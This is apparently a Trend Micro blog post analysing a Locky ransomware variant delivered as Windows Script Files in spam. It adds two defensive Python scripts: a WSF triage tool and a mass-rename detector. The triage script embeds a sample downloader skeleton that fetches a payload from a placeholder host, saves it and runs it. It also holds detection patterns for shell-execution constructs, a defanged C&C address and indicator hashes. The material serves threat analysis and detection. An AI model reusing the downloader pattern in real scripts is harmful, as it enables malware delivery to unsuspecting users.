New Locky Ransomware Spotted in the Brazilian Underground Market, Uses Windows Script Files

Like a game of cat and mouse, the perpetrators behind the Locky ransomware have updated their arsenal yet again with a new tactic: using Windows Script Files (WSF) as the arrival method. A WSF file is an XML wrapper that can combine multiple scripting languages, such as JScript and VBScript, within a single file. Using WSF makes detection and analysis of the ransomware harder, since WSF files are not among the file types that traditional endpoint solutions typically monitor for malicious activity.

The use of WSF files is not a novel idea, however: the same tactic was used in Cerber’s email campaign in May 2016. The attackers behind Locky appear to have followed Cerber’s lead after seeing how well WSF files bypassed security measures such as sandboxing and blacklisting.

Arrival method and social engineering lures

For the entry point, this Locky variant uses spam emails with .ZIP attachments that contain WSF files. Subject lines such as “bank account record”, “annual report” and “company database” suggest that the attackers are targeting companies. We also noticed that most of these spam emails were sent between 9 a.m. and 11 a.m. (UTC), when employees in European countries are starting their working day. In addition, our data showed a high volume of spam runs during weekdays and a drop during weekends.


Figure 1. Sample of a spammed email message


Figure 2. Volume of spam emails with WSF attachments (July 13-Aug 3, 2016)


Figure 3. Number of spam emails sent per hour from July 25-29, 2016

Interestingly, we found a spam sample with the subject “Voicemail from Anonymous.” This could mean that the cybercriminals are taking advantage of the popularity of Anonymous. On the other hand, “Anonymous” could also simply refer to an unknown caller.


Figure 4. Spammed email with the subject, Voicemail from Anonymous

The first wave of this spam campaign was seen on July 15, with each email originating from a different IP address. The initial spam run was sent from Serbia, Colombia, and Vietnam. Another wave was seen on July 18 and 19, with emails coming from countries such as Thailand and Brazil.

Why WSF?

The WSF files are employed as downloaders of the actual ransomware. This technique lets the threat bypass security measures, including sandbox analysis, since WSF is not among the file types that such controls are built to recognize and execute. In addition, blending scripting languages makes it easy to encode the samples, which makes them arduous to analyze.

As with VBScript and JavaScript, WSF lets attackers download any malware payload. In Locky’s case, the ransomware binaries downloaded by these WSF files have different hashes, and when the downloaded files all have different hashes, blacklisting them becomes difficult. The samples we analyzed carry file properties that describe them as a “Yahoo Widget” file, to pass them off as legitimate.


Figure 5. This malware has properties posing as a Yahoo Widget.


Figure 6. The ransomware downloaded by WSF has different file names and hashes.
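To make the “blended scripting languages” point concrete, here is a small static triage script for WSF files. It is an added example and not code from this post or from Trend Micro: a WSF is an XML document in which a `<job>` wraps one or more `<script language="...">` blocks, so one file can mix JScript and VBScript. The script parses that structure, lists the languages used, and flags the Windows Script Host and COM constructs that script-based downloaders rely on. The indicator patterns, the verdict rule and the two sample WSF files are assumptions for illustration; none of it is taken from the Locky samples described above.

```python
"""Static triage of a Windows Script File (WSF).

Added example, not code from the Trend Micro post. A WSF is an XML document
in which a <job> wraps one or more <script language="..."> blocks, so one
file can mix JScript and VBScript. This script parses that structure, lists
the languages used, and flags the Windows Script Host / COM constructs that
script-based downloaders rely on. The indicator patterns, the verdict rule
and the two sample files are assumptions for illustration, not indicators
taken from the Locky samples described in the post.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: a two-language skeleton shaped like a WSF downloader.
# The URL is a placeholder; nothing in this string is executed.
SAMPLE_DOWNLOADER = """<job id="main">
<script language="VBScript">
  Dim target: target = "C:\\Users\\Public\\update.exe"
</script>
<script language="JScript">
  var http = new ActiveXObject("MSXML2.XMLHTTP");
  http.open("GET", "http://example.invalid/payload", false);
  http.send();
  var stream = new ActiveXObject("ADODB.Stream");
  stream.Open(); stream.Type = 1; stream.Write(http.responseBody);
  stream.SaveToFile(target, 2);
  new ActiveXObject("WScript.Shell").Run(target);
</script>
</job>"""

# Constructed benign sample: one language, no network or process activity.
SAMPLE_BENIGN = """<job id="hello">
<script language="VBScript">
  WScript.Echo "hello"
</script>
</job>"""

# Indicator patterns (assumed); each maps a name to the regex that detects it.
INDICATORS = {
    "http_client": re.compile(
        r'ActiveXObject\(\s*"(?:MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest)',
        re.I),
    "binary_stream": re.compile(r"ADODB\.Stream", re.I),
    "save_to_disk": re.compile(r"\.SaveToFile\s*\(", re.I),
    "shell_exec": re.compile(r"WScript\.Shell|Shell\.Application|\.Run\s*\(|\.Exec\s*\(", re.I),
    "url": re.compile(r"""https?://[^\s"']+""", re.I),
}


def analyze_wsf(text):
    """Parse a WSF and return languages, indicator hit counts, URLs and a verdict."""
    root = ET.fromstring(text)
    languages, external, hits, urls = set(), [], {}, []
    # Element.iter() yields the element itself, so this works whether the root
    # is a single <job> or a <package> containing several jobs.
    for job in root.iter("job"):
        for script in job.iter("script"):
            languages.add((script.get("language") or "unspecified").lower())
            if script.get("src"):          # code pulled in from another file or URL
                external.append(script.get("src"))
            body = script.text or ""
            for name, pattern in INDICATORS.items():
                count = len(pattern.findall(body))
                if count:
                    hits[name] = hits.get(name, 0) + count
            urls.extend(INDICATORS["url"].findall(body))
    # Assumed verdict rule: something is fetched AND something is written or run.
    fetches = "http_client" in hits or "url" in hits or bool(external)
    executes = "save_to_disk" in hits or "shell_exec" in hits
    return {
        "languages": sorted(languages),
        "mixed_languages": len(languages) > 1,
        "external_scripts": external,
        "hits": hits,
        "urls": urls,
        "verdict": "suspicious" if fetches and executes else "benign",
    }


if __name__ == "__main__":
    for label, sample in (("downloader", SAMPLE_DOWNLOADER), ("benign", SAMPLE_BENIGN)):
        print(label, analyze_wsf(sample))
```

The point of parsing the XML rather than grepping the whole file is that each `<script>` block is scored in its own language context, so a downloader that splits the fetch into a JScript block and the execution into a VBScript block (or hides behind an external `src=`) still ends up with both halves of the verdict rule satisfied.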

Probing deeper into the threat

Analysis of this ransomware shows that it reads a registry key to determine the system’s language before displaying the ransom notes: if the machine’s default language is English, for example, the ransom notes are shown in English. The same behavior of first checking the system language was seen in JIGSAW and CRYPTLOCK, as well as in Police ransomware (REVETON).


Figure 7. This malware queries the machine language before displaying the ransom notes.


Figure 8.  Ransom notes in English


Figure 9. Ransom notes in Brazilian Portuguese

For command-and-control (C&C) communication, this threat uses SSH or OpenVPN to encrypt its network traffic. One of the C&C servers is a Tor hidden service reached through the onion.to gateway: zjfq4lnfbs7pncr5[.]onion[.]to.

Like other Locky variants of this period, it changes the extension of every encrypted file to .ZEPTO once encryption is done, and it uses native APIs to perform that rename.
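The rename to .ZEPTO is also the most visible behavior on the endpoint. Where file renames are logged (EDR telemetry, Sysmon, an audit agent), encryption shows up as one process renaming many files, in many folders, to the same new extension within seconds. The script below, an added example rather than code from the post or from Trend Micro, implements that heuristic over a constructed event list and keeps the .zepto and .locky names only as a small known-bad set, so an unknown extension still trips the burst rule. The event format, the thresholds and the sample events are assumptions, and the .zepto file names in the sample are invented rather than Locky’s real naming scheme.

```python
"""Detect a mass-rename burst to a single new extension, such as .zepto.

Added example, not code from the Trend Micro post. The post notes that this
Locky variant renames encrypted files to the .ZEPTO extension through native
APIs. On an endpoint that logs file renames, that shows up as one process
renaming many files, in many folders, to the same new extension within
seconds. This script implements that heuristic over a constructed event list;
the event format, thresholds, sample events and the known-bad extension set
are assumptions.
"""
from collections import defaultdict
from pathlib import PureWindowsPath

# Extensions Locky is known to append (assumed small set; extend as needed).
RANSOM_EXTENSIONS = {".zepto", ".locky"}
WINDOW_SECONDS = 60     # burst window
MIN_FILES = 5           # renames inside the window needed to raise an alert
MIN_DIRECTORIES = 2     # spread across folders separates encryption from batch jobs

# Constructed rename events: (timestamp_seconds, process_image, old_path, new_path).
# The .zepto file names are invented and do not follow Locky's real naming.
SAMPLE_EVENTS = [
    (100.0, "svchost.exe", r"C:\Windows\Temp\a.tmp", r"C:\Windows\Temp\a.log"),
    (110.0, "winword.exe", r"C:\Users\ana\Documents\report.docx", r"C:\Users\ana\Documents\~$report.docx"),
    # A batch image converter: many renames, one folder, legitimate.
    (120.0, "convert.exe", r"C:\Photos\IMG_1.heic", r"C:\Photos\IMG_1.jpg"),
    (121.0, "convert.exe", r"C:\Photos\IMG_2.heic", r"C:\Photos\IMG_2.jpg"),
    (122.0, "convert.exe", r"C:\Photos\IMG_3.heic", r"C:\Photos\IMG_3.jpg"),
    (123.0, "convert.exe", r"C:\Photos\IMG_4.heic", r"C:\Photos\IMG_4.jpg"),
    (124.0, "convert.exe", r"C:\Photos\IMG_5.heic", r"C:\Photos\IMG_5.jpg"),
    # Encryption run: many renames, several folders, same new extension.
    (200.0, "update.exe", r"C:\Users\ana\Documents\report.docx", r"C:\Users\ana\Documents\1.zepto"),
    (200.5, "update.exe", r"C:\Users\ana\Documents\budget.xlsx", r"C:\Users\ana\Documents\2.zepto"),
    (201.0, "update.exe", r"C:\Users\ana\Documents\notes.txt", r"C:\Users\ana\Documents\3.zepto"),
    (201.5, "update.exe", r"C:\Users\ana\Desktop\photo.jpg", r"C:\Users\ana\Desktop\4.zepto"),
    (202.0, "update.exe", r"C:\Users\ana\Desktop\contract.pdf", r"C:\Users\ana\Desktop\5.zepto"),
    (202.5, "update.exe", r"C:\Users\ana\Desktop\thesis.docx", r"C:\Users\ana\Desktop\6.zepto"),
]


def extension(path):
    """Lowercase extension of a Windows path, e.g. '.zepto'."""
    return PureWindowsPath(path).suffix.lower()


def detect_rename_bursts(events, window=WINDOW_SECONDS, min_files=MIN_FILES, min_dirs=MIN_DIRECTORIES):
    """Return one alert per (process, new extension) whose densest window breaches both thresholds."""
    by_key = defaultdict(list)
    for ts, process, old_path, new_path in sorted(events):
        old_ext, new_ext = extension(old_path), extension(new_path)
        if new_ext and new_ext != old_ext:       # only renames that change the extension
            by_key[(process, new_ext)].append((ts, old_ext, str(PureWindowsPath(new_path).parent)))

    alerts = []
    for (process, new_ext), items in by_key.items():
        # Sliding window over the time-sorted items: keep the densest window.
        best, start = (0, 0), 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            if end - start > best[1] - best[0]:
                best = (start, end)
        burst = items[best[0]:best[1] + 1]
        directories = {d for _, _, d in burst}
        if len(burst) >= min_files and len(directories) >= min_dirs:
            alerts.append({
                "process": process,
                "new_extension": new_ext,
                "known_ransomware_extension": new_ext in RANSOM_EXTENSIONS,
                "files": len(burst),
                "directories": len(directories),
                "original_extensions": sorted({e for _, e, _ in burst}),
                "first_seen": burst[0][0],
                "last_seen": burst[-1][0],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_rename_bursts(SAMPLE_EVENTS):
        print(alert)
```

The directory-spread threshold is what keeps the converter in the sample quiet: a batch job typically rewrites one folder, while an encryptor walks the whole profile. Dropping `min_dirs` to 1 makes the converter trip the rule as well, which is the trade-off to tune against your own telemetry.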

The developers of this new Locky variant appear to be based in Brazil, as we spotted the threat being sold in the Brazilian underground market. We also found a user (alias unknown_antisec) sharing on Facebook a blog post, originally published on Trend Micro’s Brazil blog, that discussed our findings on the Brazilian underground. That user added a caption in Brazilian Portuguese that translates to “Sup dog, they’ve got you ransomware.” Brazilian cybercriminals typically use social media or the surface web to advertise their products and services.

A multilayered defense strategy

Locky ransomware continues to evolve, from macros to JavaScript and VBScript and now to WSF. By design, this file type can combine any Windows Script Host language, including JScript, which RAA ransomware previously used for obfuscation.

Because WSF files can bypass traditional blacklisting and sandbox analysis, it is best to stop this new breed of Locky at the exposure layer. We protect our customers at the gateway by detecting Locky-related spam and stripping WSF attachments from the emails, which prevents the malicious file from ever executing. Our sandbox is also able to prevent the malware from running on the system, since the new tactics associated with this ransomware are already detected.

Trend Micro offers solutions that protect users and organizations at every layer: the gateway, endpoints, the network, and servers.


  • Endpoint Protection

    Trend Micro Smart Protection Suites detects and stops suspicious behavior and exploits associated with ransomware at the endpoint level.

    Ransomware Behavior Monitoring
    Application Control
    Vulnerability Shielding
    Web Security
  • Network Protection

    Trend Micro Deep Discovery Inspector detects malicious traffic, communications, and other activities associated with attempts to inject ransomware into the network.

    Network Traffic Scanning
    Malware Sandbox
    Lateral Movement Prevention
  • Server Protection

    Trend Micro Deep Security™ detects and stops suspicious network activity and shields servers and applications from exploits.

    Webserver Protection
    Vulnerability Shielding
    Lateral Movement Prevention


  • Protection for Home Users

    Trend Micro Security 10 provides robust protection against ransomware by blocking malicious websites, emails, and files associated with this threat.

    IP/Web Reputation
    Ransomware Protection

Related SHA1 hashes: 


  • 0A17D419461F2A7A722F4E15C2760D182626E698
  • 0B4396BD30F65B74CE38F7F8F6B7BC1E451FBCCC
  • 0C82F9EBC4ACE5D6FD62C04972CF6A56AA022BFD
  • 21DCA77E6EF9E89C788EE0B592C22F5448DE2762
  • 288C7C4FA2FC2A36E532F938B1DC18E4918A0E36
  • 69DA16CB954E8E48CEA4B64A6BBC267ED01AB2B3
  • 6A9B6AE21C5F5E560591B73D0049F6CA2D720122
  • 752AB2146016BCAFBFE17F710D61D3AD3822F849
  • 8BDC38B005E09B34C1BCE94529158DE75408E905
  • B8B79E8BAF39E0E7616170216B25C1505974F42C
  • 5994eb7696e11818d01bc7447adcf9ec5c1c5f13
  • 936ac2f42a1a641d52ba8078c42f5879e2dd41a0
  • 0b7b2ba3c35e334bf5bc13929c77ecaf51758e2b
  • 3bc8656186ee93d25173ba0f3c07a9cced23e7cd
  • 08f1565514122c578da05cbf8b50ee9dcfa41af6
  • 4641fb72aaf1461401490eaf1916de4103bbece5
  • 3790c8bc8e691c79d80e458ba5e5c80b0b12a0c8
  • 91762a5406e5291837ed259cd840cf4d22a2ddfa
  • 005cc479faa2324625365bde7771096683312737
  • eb01089b3625d56d50e8768e94cfef1c84c25601


  • 812FBF9E30A7B86C4A72CCA66E1D2FC57344BB09
  • AE78A7B67CB5D3C92406CFA9F5FB38ADC8015FDF
  • 0e76d8fd54289043012a917148dacda0730e4d88
  • c76222e1206bad8e9a4a6f4867b2e235638a4c4c


  • A2420F7806B3E00DB9608ABF80EE91A2447F68AD
  • A94CE98BCC9A130AA88E9655672497C701BDA4A5
  • fc591d83cdebe57b60588f59466ec3b12283cc2c
  • 719f0d406038b932805d338f929d12c899ec97e1


  • DA0FD77C60A2C9A53985A096BDAE1BEF89034A01
  • 56dd1d2b944dae25e87a2f9b7d6c653b2ece4486


  • 180BDD12C3EE6D8F0A2D47DDAAD5A2DAA513883E
  • 2C62F7B01DD423CEF488100F7C0CA440194657D9
  • 6DECCBB36F4E83834985FE49FC235683CF90F054
  • E2D94F69134D97C71F2B70FC0A3558B30637E46D
  • E3E49BF06CD03FB0EA687507931927E32E0A5A1C


  • 22DE960D38310643C3E68C2BA8EC68D855B43EBD


  • 5A044104A6EED7E343814B3E0FC2DB535C515EA2
  • 9BA7499C98E2B52303912352E1ACA694552E0E86
  • 9F48FA841FC8B0E945C43DB5B18B37BDF2DA8F5B


  • 3329FB8FD5E664CCDE59E12E608E0BCE3EF95225
  • 5BE1DE4A018B746953381EA400278D25E7C3D024
  • B2D1E7860F617014E0546B9D48450F221FE118EC
  • BB8ABA09BC9B97C7358B62F2FF016D05955A5967


  • 1A46C45A443B1C10EAA9AA317CD343B83160828F
  • A2899353B237E08A7570C674D05D326D43173231
  • D8FF29CFF5341B361CA3CEE67EABBD22698DAA2B


  • 565951232E4A1D491D932C916BC534E8FB02B29B


  • E362B04FE7F26663D7D43DD829D3C4310B2FC699


  • 6014A6AFDF09EDEB927A9A6A4E0DF591D72B1899
  • DCDB228D515F08673542B89ABB86F36B3B134D72

Additional insights and data by Franklynn Uy and Jon Oliver

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Story added 15 August 2016.